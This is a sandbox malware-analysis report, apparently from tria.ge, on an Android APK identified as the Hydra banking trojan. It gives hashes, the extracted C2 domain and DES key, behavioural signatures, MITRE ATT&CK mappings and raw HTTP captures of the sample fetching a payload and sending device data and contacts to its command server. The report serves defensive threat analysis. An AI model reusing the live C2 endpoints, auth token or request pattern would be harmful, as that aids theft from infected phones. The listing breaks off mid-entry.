Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

6

80b3f01ac5...09.apk

android-9-x86

1

80b3f01ac5...09.apk

android-10-x64

10

80b3f01ac5...09.apk

android-11-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    160s
  • platform
    android-10_x64
  • resource
    android-x64-20240910-en
  • resource tags

    arch:x64arch:x86image:android-x64-20240910-enlocale:en-usos:android-10-x64system
  • submitted
    18/01/2025, 22:00 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    80b3f01ac51a6ec4f2d7e11cd72cb303b5ac9c98308cb3424cc1c9cfd0cc1d09.apk

  • Size

    4.5MB

  • MD5

    a13a0a82932d8b088aaeb396fb0dbff0

  • SHA1

    d2753b59c297536c432a12dbcf59bc9a32ee63dc

  • SHA256

    80b3f01ac51a6ec4f2d7e11cd72cb303b5ac9c98308cb3424cc1c9cfd0cc1d09

  • SHA512

    4bbc1ceb848703238a295576055126c1dede5096040a12edbe8749a0e1a8ad7afe699bf1fe2a214bdf2a7b9d6cdea356593e55215c94fdef2581954135303fc1

  • SSDEEP

    98304:KeYGGBavlNTNEGimhiRon9KqzTe7ifNj6LXBURxytvxVrwBY2Us:KeYGmavllNwkB9Ne7WNj6LXiRxyb1wBf

Score
10/10
hydrabankercollectioncredential_accessdiscoveryevasioninfostealerpersistencetrojan

Malware Config

Extracted

Family

hydra

C2

http://waehwedbosntonz30facezconiboesd12312sergag.com

DES_key
1
616a706370706673

Signatures

  • Hydra

    Android banker and info stealer.

    bankertrojaninfostealerhydra
  • Hydra family
    hydra
  • Hydra payload 1 IoCs
  • Loads dropped Dex/Jar 1 TTPs 2 IoCs

    Runs executable file dropped to the device during analysis.

    evasion
  • Makes use of the framework's Accessibility service 4 TTPs 2 IoCs

    Retrieves information displayed on the phone screen using AccessibilityService.

    collectionevasioncredential_access
  • Queries a list of all the installed applications on the device (Might be used in an attempt to overlay legitimate apps) 1 TTPs
    bankerdiscovery
  • Reads the contacts stored on the device. 1 TTPs 1 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Makes use of the framework's foreground persistence service 1 TTPs 1 IoCs

    Application may abuse the framework's foreground service to continue running in the foreground.

    evasionpersistence
  • Performs UI accessibility actions on behalf of the user 1 TTPs 1 IoCs

    Application may abuse the accessibility service to prevent their removal.

    evasion
  • Queries information about active data network 1 TTPs 1 IoCs
    discovery
  • Queries the mobile country code (MCC) 1 TTPs 1 IoCs
    discovery
  • Reads information about phone network operator. 1 TTPs
    discovery
  • Registers a broadcast receiver at runtime (usually for listening for system events) 1 TTPs 1 IoCs
    persistence

Processes

  • com.zqjtgzarm.jqrjbmbsj
    1⤵
    • Loads dropped Dex/Jar
    • Makes use of the framework's Accessibility service
    • Reads the contacts stored on the device.
    • Makes use of the framework's foreground persistence service
    • Performs UI accessibility actions on behalf of the user
    • Queries information about active data network
    • Queries the mobile country code (MCC)
    • Registers a broadcast receiver at runtime (usually for listening for system events)
    PID:5215

Network

  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    172.217.16.238
  • flag-us
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    142.250.187.232
  • flag-us
    DNS
    waehwedbosntonz30facezconiboesd12312sergag.com
    Remote address:
    1.1.1.1:53
    Request
    waehwedbosntonz30facezconiboesd12312sergag.com
    IN A
    Response
    waehwedbosntonz30facezconiboesd12312sergag.com
    IN A
    45.83.20.56
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/mirrors
    Remote address:
    45.83.20.56:80
    Request
    GET /api/mirrors HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
    Content-Encoding: gzip
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true
    Remote address:
    45.83.20.56:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:14 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/lock
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/lock HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 18
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:14 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 166
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:27 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 6166
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:27 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true
    Remote address:
    45.83.20.56:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:35 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/storage/zip/Qg3adw2CpmSHwj59qrSgHGA9mVSkpmKkIJmNakGa.zip
    Remote address:
    45.83.20.56:80
    Request
    GET /storage/zip/Qg3adw2CpmSHwj59qrSgHGA9mVSkpmKkIJmNakGa.zip HTTP/1.1
    Range: bytes=0-
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 206 Partial Content
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:36 GMT
    Content-Type: application/zip
    Content-Length: 75794179
    Connection: keep-alive
    Last-Modified: Tue, 14 Jan 2025 12:22:02 GMT
    ETag: "678656ea-4848703"
    Content-Range: bytes 0-75794178/75794179
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 166
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:03:30 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/payload
    Remote address:
    45.83.20.56:80
    Request
    GET /payload HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:14 GMT
    Content-Type: application/octet-stream
    Content-Length: 997816
    Connection: keep-alive
    Last-Modified: Sat, 21 Sep 2024 12:25:51 GMT
    ETag: "66eebb4f-f39b8"
    Accept-Ranges: bytes
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:14 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/update
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/update HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 31
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:27 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:36 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    DNS
    ip-api.com
    Remote address:
    1.1.1.1:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/json
    Remote address:
    208.95.112.1:80
    Request
    GET /json HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: ip-api.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Date: Sat, 18 Jan 2025 22:01:26 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 291
    Access-Control-Allow-Origin: *
    X-Ttl: 26
    X-Rl: 41
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/contacts
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/contacts HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 15
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:27 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true
    Remote address:
    45.83.20.56:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:56 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:01:56 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true
    Remote address:
    45.83.20.56:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:02:16 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:02:16 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true
    Remote address:
    45.83.20.56:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:02:36 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:02:36 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true
    Remote address:
    45.83.20.56:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:02:56 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:02:57 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    GET
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true
    Remote address:
    45.83.20.56:80
    Request
    GET /api/v1/device/check?screen=true HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:03:16 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • flag-us
    POST
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    Remote address:
    45.83.20.56:80
    Request
    POST /api/v1/device/server-log HTTP/1.1
    Authorization: f90eaf33bb72ee9d
    Content-Type: application/json
    charset: utf-8
    Content-Length: 124
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: waehwedbosntonz30facezconiboesd12312sergag.com
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sat, 18 Jan 2025 22:03:18 GMT
    Content-Type: application/json
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: no-cache, private
  • 216.58.212.234:443
    tls, https
    1.2kB
     40 B
     1
    1
  • 216.58.212.206:443
    tls, https
    914 B
     40 B
     1
    1
  • 172.217.16.238:443
    android.apis.google.com
    tls
    3.5kB
     7.8kB
     14
    20
  • 142.250.178.10:443
    tls, https
    2.3kB
     40 B
     1
    1
  • 142.250.187.232:443
    ssl.google-analytics.com
    tls
    1.4kB
     6.3kB
     10
    9
  • 45.83.20.56:80
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device
    http
    1.0MB
     78.6MB
     19099
    53015

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/api/mirrors

    HTTP Response

    200

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/lock

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device

    HTTP Response

    200

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/storage/zip/Qg3adw2CpmSHwj59qrSgHGA9mVSkpmKkIJmNakGa.zip

    HTTP Response

    206

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device

    HTTP Response

    200
  • 45.83.20.56:80
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    http
    21.6kB
     1.0MB
     348
    694

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/payload

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/update

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log

    HTTP Response

    403
  • 208.95.112.1:80
    http://ip-api.com/json
    http
    412 B
     600 B
     4
    3

    HTTP Request

    GET http://ip-api.com/json

    HTTP Response

    200
  • 45.83.20.56:80
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    http
    2.3kB
     20.8kB
     24
    23

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/contacts

    HTTP Response

    200

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log

    HTTP Response

    403
  • 142.250.180.14:443
    52 B
     1
  • 142.250.180.14:443
    416 B
     8
  • 142.250.200.2:443
    416 B
     8
  • 45.83.20.56:80
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    http
    1.7kB
     20.4kB
     18
    20

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log

    HTTP Response

    403
  • 45.83.20.56:80
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    http
    1.8kB
     20.5kB
     21
    22

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log

    HTTP Response

    403
  • 45.83.20.56:80
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    http
    1.7kB
     20.4kB
     19
    19

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log

    HTTP Response

    403
  • 45.83.20.56:80
    http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log
    http
    1.7kB
     20.4kB
     19
    20

    HTTP Request

    GET http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://waehwedbosntonz30facezconiboesd12312sergag.com/api/v1/device/server-log

    HTTP Response

    403
  • 66.102.1.188:5228
    208 B
     4
  • 216.239.36.223:443
    312 B
     6
  • 216.239.36.223:443
    312 B
     6
  • 142.250.180.4:443
    156 B
     3
  • 224.0.0.251:5353
    3.7kB
     11
  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
     109 B
     1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    172.217.16.238

  • 1.1.1.1:53
    ssl.google-analytics.com
    dns
    70 B
     86 B
     1
    1

    DNS Request

    ssl.google-analytics.com

    DNS Response

    142.250.187.232

  • 1.1.1.1:53
    waehwedbosntonz30facezconiboesd12312sergag.com
    dns
    92 B
     108 B
     1
    1

    DNS Request

    waehwedbosntonz30facezconiboesd12312sergag.com

    DNS Response

    45.83.20.56

  • 1.1.1.1:53
    ip-api.com
    dns
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

MITRE ATT&CK Mobile v15

Initial Access

Execution

Persistence

Event Triggered Execution

1
T1624

Broadcast Receivers

1
T1624.001

Foreground Persistence

1
T1541

Privilege Escalation

Defense Evasion

Download New Code at Runtime

1
T1407

Foreground Persistence

1
T1541

Impair Defenses

1
T1629

Prevent Application Removal

1
T1629.001

Input Injection

1
T1516

Credential Access

Input Capture

2
T1417

GUI Input Capture

1
T1417.002

Keylogging

1
T1417.001

Discovery

Software Discovery

1
T1418

Security Software Discovery

1
T1418.001

System Network Configuration Discovery

2
T1422

System Network Connections Discovery

1
T1421

Lateral Movement

Collection

Input Capture

2
T1417

GUI Input Capture

1
T1417.002

Keylogging

1
T1417.001

Protected User Data

1
T1636

Contact List

1
T1636.003

Screen Capture

1
T1513

Command and Control

Exfiltration

Impact

Input Injection

1
T1516

Replay Monitor

Loading Replay Monitor...

Downloads

  • /data/data/com.zqjtgzarm.jqrjbmbsj/app_apk/payload.apk
    Filesize

    974KB

    MD5

    3baeaa766ea7f31a9147208efd957c75

    SHA1

    c701de3d0e55425394ccbf8e0967639e86f3c54e

    SHA256

    75e162dc291e15d13b0f3202a66e0c88ff2db09ec02922ee64818dbddcb78d6d

    SHA512

    9f3ccb1fc9a177524ba2d39f809be4851af385073463893bd4a8664308253fc0da2b9ab330c85675dbe9ce0c44b631a0d1ec7800491687c7b2540504b351295f

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/app_dex/classes.dex
    Filesize

    2.7MB

    MD5

    71e628d8f95c11e143e5b645fc74bce6

    SHA1

    0f100870f00f5684fe4beaaa1a0f128f2d441494

    SHA256

    6e014553faf9c0bb2ebd64633522ca04ea33531a5a4cd1a37b085e0cb3154800

    SHA512

    f991702c3a573843f6370b9e2934f7f0488915da23fe6a6b8e42d45cebf2f3b29c549abbbeed19970940efe85fa1f3fc589f557bbe247a4d25a1f5ec5ce5008a

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/cache/Qg3adw2CpmSHwj59qrSgHGA9mVSkpmKkIJmNakGa.zip
    Filesize

    72.3MB

    MD5

    475a21af4ef1e6fb489f3689ff7723da

    SHA1

    bbb36976ef7fa231f4170b32c18adf146a8a97cc

    SHA256

    74027f6a318698dcb6d16f4c920b529910410b9aae16b9e0108c8173317539ee

    SHA512

    f4d4c90914460ecd1b54dc901dbabd496856d8ff5b6fd61599748e36043325803d1670ce738d233dbc526437dfc6b8378fbcc13365f6738518e67967186c4631

    Download Submit

  • /data/data/com.zqjtgzarm.jqrjbmbsj/cache/classes.dex
    Filesize

    1.3MB

    MD5

    4cafe8c2c6dd74d036b2dcad6f878c43

    SHA1

    1eda52e9554f2ecb8f43df01521c5f0c0cb0a8fd

    SHA256

    c7d82d75d274536f86bbff879abd898d631127fe391ffcc534834a7ed6817fda

    SHA512

